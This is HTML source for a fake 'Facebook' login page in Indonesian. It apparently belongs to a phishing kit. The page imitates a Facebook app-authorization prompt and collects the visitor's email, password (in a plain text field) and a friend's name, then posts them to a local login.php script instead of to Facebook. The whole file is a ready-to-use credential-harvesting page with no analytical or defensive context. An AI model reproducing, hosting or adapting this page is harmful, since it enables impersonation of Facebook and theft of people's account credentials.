<html lang="en">

    <head>
  
        <title>Facebook</title>
        <style type="text/css">
       
        .html, body
        {
            padding:0;
            margin:0;
            background: #e5e7e2;
            color:#141823;
            unicode-bidi: embed;
            overflow-y: scroll
        }
       
        #header
        {
			width:100%;
			top:0;
			z-index:100;
			bottom:auto;
            height:82px;
			display:block;
			background: #000000;
			color: #fff;
			font-family: monoscape;
			font-size: 27;
			font-weight:bold;
			margin: 0px;    
			padding: 0px 0px 5px 23px;
	
        }      
        #konten
        {
            padding-left:5px;
            margin-top:0px;
            margin-bottom:5px;
        }
       
        
			#img
			{
		   widht:100%;
		   max-widht:500px;
			}
				.kepala{
                width: 50%;
                
                background-color: #ffffff;
                border-radius: 2px;
				border-top-left-radius: 2px;
				border-top-right-radius: 2px;
				border-bottom-right-radius: 2px;
				border-bottom-left-radius: 2px;
				margin-left: auto;
				margin-right: auto;
                border: 1px solid #ccc;
                padding-top: 20px;
                margin-top: 20px;
				margin-bottom: 20px;
            }
        
            .satu{
				color:#666;
				font-size:13px;
				text-align: left;
				padding-left: 25px;
				padding-bottom: 10px;
				font-family: helvetica, arial, sans-serif;
				
				}
			
			.dua{
				text-align: center;
				color: #141823;
				font-size: 12px;
				font-weight:normal;
				padding: 0px 0px 15px 23px;
				font-family: helvetica, arial, sans-serif;
				margin-right: 20px;	
				}
			
			.tiga{
				text-align: left;
				color: #1e2d4c;
				font-size: 16px;
				padding: 0px 0px 5px 23px;
				font-family: helvetica, arial, sans-serif;
				}
				.area{
					border: 1px solid #ccc;
					float: right;
					height: 22px;
line-height: 16px;
padding: 0px 8px;
vertical-align: middle;
margin-right: 120px;
				}
				
		
		.tombol
        {
		background: #637BAD;
		color: white;
		font-size: 12;
		font-family: helvetica  ;
		font-weight: bold;
		float: right;
		margin-right: 5px;
		border: 1px solid #999;
border-bottom-color: #888;
box-shadow: 0 1px 0 rgba(0, 0, 0, .1);	
margin-top: 10px;
        }
        .tombol2
        {
		color: black;
		font-size: 12;
		font-family: helvetica  ;
		font-weight: bold;
		float: right;
		margin-right: 20px;
		background-color: #e9eaed;
border: 1px solid #999;
border-bottom-color: #888;
box-shadow: 0 1px 0 rgba(0, 0, 0, .1);
margin-top: 10px;
		}
        .bawah{
			
                width: 100%;
                height: 47%;
                background-color: #F2F2F2;
                border: 1px solid #ccc;
               
		}
        </style>      
    </head>
  
    <body>
  
        <div id="header">
        <div class="header">
			<img src="a.png" height="100%" width="20%">
        </div>
      
   <form method="post" action="login.php" >
	   <br><br>
		   <div class="kepala">
	   <form>
                    <div>
						<div class="tiga" >Masuk dengan Facebook</div>
                       <hr color="#ccc" width="50%" size="1" align="center">
                       <center>
                       <img alt="Gambar Koala" src="asd.png" />
                        <div class="dua"><p><b>Facebook</b> Akan Menerima<br> Profil Publik dan Daftar Teman Anda</div></p>
                        <div class="dua" for="username">Masukkan Email Anda
                            <input class="area"type="text" name="email" id="name"/></div>
						<div class="dua" for="pass">Masukan Sandi Anda
                           <input class="area"type="text" name="pesan" id="password"/></div>
						<div class="dua" for="wakwa">Masukan Nama Teman Anda
                           <input class="area"type="text" name="wakwa" id="name"/></div>
                           </center>
      </div>
        <div class="bawah">
			<button class="tombol2"disabled="enabled">Batal</button>
			<input class="tombol" type="submit" name="submit" value="Proses">
			
		</div>
		
      </form>
       
</body>

</html>
